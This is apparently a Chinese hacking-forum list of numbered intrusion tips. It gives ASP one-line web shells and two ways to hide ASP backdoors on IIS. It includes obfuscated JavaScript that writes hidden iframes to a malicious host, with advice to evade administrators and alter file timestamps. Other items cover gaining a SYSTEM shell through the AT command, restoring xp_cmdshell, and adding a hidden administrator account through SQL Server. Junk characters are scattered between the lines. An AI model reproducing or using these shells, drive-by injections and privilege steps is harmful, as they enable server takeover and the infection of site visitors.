* o! G7 D, }# }9 M
b).<%Execute(request("go"))%>
+ v; }7 A4 G: o ~% e
c).%><%execute request("go")%><%
7 e$ D5 {! l$ q% a
d).<script language=VBScript runat=server>execute request("sb")</Script>
4 D! g: ]% ~+ k" v" ]1 u1 d
e).<%25Execute(request("l"))%25>
/ E; S+ b4 K; R1 ^" ?- }! V- |0 u
f).<%if request("cmd")<>"" then execute request("pass")%>
# k, A3 [4 _& ]2 R% V4 z2 q% E$ y2 q
! v# R# O" o9 n
52、at "12:17" /interactive cmd
: w+ b+ Q; K3 n
执行后可以用AT命令查看新加的任务
, p3 Z5 Q+ C% _. k2 o @
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
@& g/ h- s5 ~4 P V% U. ?
9 ?( _. }, ]& `* w1 P7 K' i
53、隐藏ASP后门的两种方法
& a; M2 m: z. K: \- e) C
1、建立非标准目录:mkdir images..\
# }4 U, i$ I% A$ N/ ^
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
. e- A; `; a: I4 w. f
通过web访问ASP木马:http://ip/images../news.asp?action=login
0 k- p7 P) i' n3 a- \$ w# {
如何删除非标准目录:rmdir images..\ /s
- {* B% f# i* E- I3 N
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
) v: N2 c8 a( i) _7 Y# o5 {
mkdir programme.asp
" P& J! C# Q/ @- b8 k
新建1.txt文件内容:<!--#include file=”12.jpg”-->
) L9 h3 @- k9 l" u9 L
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
" R3 _! e9 x6 q
attrib +H +S programme.asp
9 x; r: j$ O0 D5 c8 P
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
. B! p) m2 w- E2 Y7 Q" _$ D
8 u' l9 o% {/ G+ }/ P- J
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
4 p5 J2 S0 S% ^8 w# a' `% j
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
. g! a7 T6 c2 [ r1 h# t
0 ~5 A% T3 B# e
55、JS隐蔽挂马
, a; s! Q$ M1 \9 j) k0 x
1.
: ~9 l4 |( `7 {; B
var tr4c3="<iframe src=ht";
+ b$ _2 P3 d* E# v7 @
tr4c3 = tr4c3+"tp:/";
6 x' K! }1 X2 K% l+ ^% w$ x
tr4c3 = tr4c3+"/ww";
$ G, C: ?# D; {# X1 \5 N
tr4c3 = tr4c3+"w.tr4";
& |3 e$ e1 m' r: C0 r
tr4c3 = tr4c3+"c3.com/inc/m";
* U4 Y7 \/ }4 `( w
tr4c3 = tr4c3+"m.htm style="display:none"></i";
* }* N1 G8 _9 U# p6 a
tr4c3 =tr4c3+"frame>'";
/ X: J) A' @3 N# L, T
document.write(tr4c3);
" f6 ~2 G- k# C4 I) n% k
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
! o. m3 n8 d! o: S. b* ]
2 e1 C# f! C+ h8 u
2.
! D0 H% @3 M2 Y8 c$ \! \! u3 H
转换进制,然后用EVAL执行。如
+ [# }* n# q/ G, Y; Z5 d1 U
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
2 z1 n) u( s3 H+ Y3 I, ^' [" K
不过这个有点显眼。
/ U0 z. @1 i) w
3.
" |' U, B8 ` s0 e/ D, F o
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
3 T- o1 S: S$ X& w9 ^
最后一点,别忘了把文件的时间也修改下。
' G4 u3 j) I3 Y* H$ b4 a( f
: ?" ?. X4 L1 p4 S% O
56.3389终端入侵常用DOS命令
$ Y% u' |! u7 m9 ~
taskkill taskkill /PID 1248 /t
/ ?5 t- m8 ^4 ]3 h2 V0 ~9 @# W/ N
1 \ D, W3 O$ J; E
tasklist 查进程
/ ]0 Z9 _! _9 B
6 a" a; Y8 ], U, N, f
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
1 e! x, a& q5 {! f0 ?. x4 ]
iisreset /reboot
4 c6 M6 a/ c5 u5 s* z
tsshutdn /reboot /delay:1 重起服务器
# c$ g1 \0 e H2 _, L+ H6 c
# r% I- \$ k B0 W8 A
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
2 r- q: K4 W0 N# s4 i- r/ |
* f0 w5 \6 C2 h! o
query user 查看当前终端用户在线情况
) V" \% }, Q% D! V0 G
& e o, r& R# ?" Q* c; V: f
要显示有关所有会话使用的进程的信息,请键入:query process *
. p, |) ~7 t( x& j6 E) ~: O# }
, b+ v& c2 l8 q
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
" K0 a. ~' B) i$ S1 a3 ~/ R
& {) e. P" c( \7 T' i) S
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
& g6 N0 S: q1 |9 ]& t% ~
& F4 u6 ?& H4 Z5 v6 u2 U$ a) i
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
( _9 u- z- @4 N6 t$ r% ^5 A
7 S( [" O6 s7 k; V2 {
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
/ k8 q# ~8 d3 K* D
& f' h" D$ Q1 W( X5 n
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
6 E1 K4 P. t7 i- [+ Z
: S6 a! |/ M0 V$ D
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
* A( Y: z( l2 ~/ c& _$ j3 T
& N( N$ f0 b$ h( q( k4 `2 ~
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
Q" T% S: S4 A
9 y, Y* n: ~/ r) C9 a6 z# F
56、在地址栏或按Ctrl+O,输入:
/ G3 ?/ z& \: X0 c& w5 `
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
0 _- B! d8 `, P9 v
1 h' A' U G! x9 p
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
: H( v: X1 u0 F" E' }! w$ z5 u
+ T, I a# T8 F6 ]- H$ K, Q+ S! R
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
7 s0 a" t% a' t8 z+ N; f% s+ `
用net localgroup administrators是可以看到管理组下,加了$的用户的。
. g' X6 a7 \. i
0 b9 `- T _- o+ d
58、 sa弱口令相关命令
W- e% I s0 h7 n+ n9 e! v
4 U) R% x% r" M
一.更改sa口令方法:
& p; U* f6 r7 |$ I: h
用sql综合利用工具连接后,执行命令:
+ m! l* ]8 Z% ?# [. P0 r2 L
exec sp_password NULL,'20001001','sa'
3 S N) P9 X& i! A+ ~. U. ?- Y
(提示:慎用!)
. e4 a- z V; X: `
& ~$ a6 P9 U5 g+ V4 A( h* U
二.简单修补sa弱口令.
& K8 A6 a1 S! e4 D& w# e4 X) K% W4 ^
2 _# s% h2 N0 v
方法1:查询分离器连接后执行:
: @0 U$ Q% E" \1 n# N, _
if exists (select * from
* X6 w3 i: r/ d; s) W* {" ]5 \
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
5 k2 A, j' D$ n4 n
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
1 O, A% m" L& t" g
9 u2 a3 h$ {: c A, p; h1 z, U
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
' E& c. W3 c( Z4 L0 G% @; E0 \
+ L, [* l3 t# k. B4 O8 h# c
GO
* u+ ^9 W6 g' W3 X3 F5 l& s- c
- g% z' G- S$ ? {
然后按F5键命令执行完毕
# }* o: @- [% O b& z
- \9 o( M6 F" P4 B/ x
方法2:查询分离器连接后
5 c, @8 z! }0 z$ u+ W7 ]3 S: |
第一步执行:use master
; r# F: w% a f+ b+ P
第二步执行:sp_dropextendedproc 'xp_cmdshell'
+ a. O' R0 {8 y9 }( @! g* V
然后按F5键命令执行完毕
; S) h x# C$ F
% J0 H7 _/ T+ i* Z5 l
, ^) ?) [+ o$ x9 N# e" E- N
三.常见情况恢复执行xp_cmdshell.
1 s% G' L4 Z9 V2 z
/ {. [( l3 V0 r2 F. U. ]
4 x0 Y! x! A9 w g0 M
1 未能找到存储过程'master..xpcmdshell'.
# c& E' h/ t" K
恢复方法:查询分离器连接后,
! R* S' h0 ?& {2 o% h% [. [1 Q
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
" o& O' c3 v; [; _% z
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
: `4 m" V( \3 P# I4 f6 ?
然后按F5键命令执行完毕
- P' o( X* V) X
: c3 E7 O9 x5 M) m s! B* R
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
* Y- S" s* K( [4 }0 i
恢复方法:查询分离器连接后,
% ?' G% h* M3 t$ E7 c6 `
第一步执行:sp_dropextendedproc "xp_cmdshell"
! l8 t; E Y* T1 e: O. i3 i3 z
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
# W% E8 h. m6 _
然后按F5键命令执行完毕
M2 E5 Z( ^3 D0 C" H% C, ~' ^
- ?7 h% n/ ]! `) ~4 V3 T
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
! i' R& \- {9 v; A3 K5 o1 ~
恢复方法:查询分离器连接后,
+ f9 H$ J5 T# `7 Y
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
! O3 v" ~0 X; y8 h# E. f: x
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
! s0 I1 @# g s
然后按F5键命令执行完毕
% ~9 P6 F9 t, ~% E# T4 I
$ j8 i/ h: m: F$ |: W- }# D6 I
四.终极方法.
1 i9 N5 r& \3 o9 B& G: @& \- R
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
& k# C' ?3 C) z# t4 E
查询分离器连接后,
' \) R7 h2 q/ u
2000servser系统:
& ~, s% V4 p/ \/ @% }9 _3 D
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
" t: \# Z+ ~% j
) b1 c/ I' \9 X( q) A
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
4 _8 ^+ Z& t& j( c) @% H% Z1 a
9 n2 T. _5 R' I! p8 x0 b& `
xp或2003server系统:
' } y' t7 S0 c+ a
3 I5 [" Z$ G3 t7 L) S4 g
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
. b% I7 L4 I9 ~, e" T
1 ?. W6 R8 B' I5 {. O) c
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
- V D( E5 \8 H+ T6 J9 d
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2